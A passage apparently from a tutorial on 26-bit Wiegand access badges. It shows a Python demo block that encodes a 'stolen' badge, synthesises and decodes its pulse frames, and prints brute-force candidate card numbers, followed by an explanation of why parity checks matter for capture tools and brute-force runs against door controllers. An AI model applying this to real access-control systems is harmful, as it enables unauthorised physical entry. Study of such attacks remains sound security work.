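if __name__ == "__main__":
    stolen = Badge(facility_code=123, card_number=45678)   # constructed badge
    for frame in frame_pulses(synth_pulses([encode_26bit(stolen)])):
        print(f"{len(frame)}-bit read ->", decode_26bit(frame))
    for i, bits in enumerate(brute_force_candidates(stolen, 3), 1):
        print(f"candidate {i}:", "".join(map(str, bits)), decode_26bit(bits))
```

The parity checks are what separate a real read from line noise or a partially captured frame; a capture tool that logs every 26-bit-looking burst without checking them will fill the SD card with garbage, and a brute-force run that emits bad parity will be silently ignored by the controller.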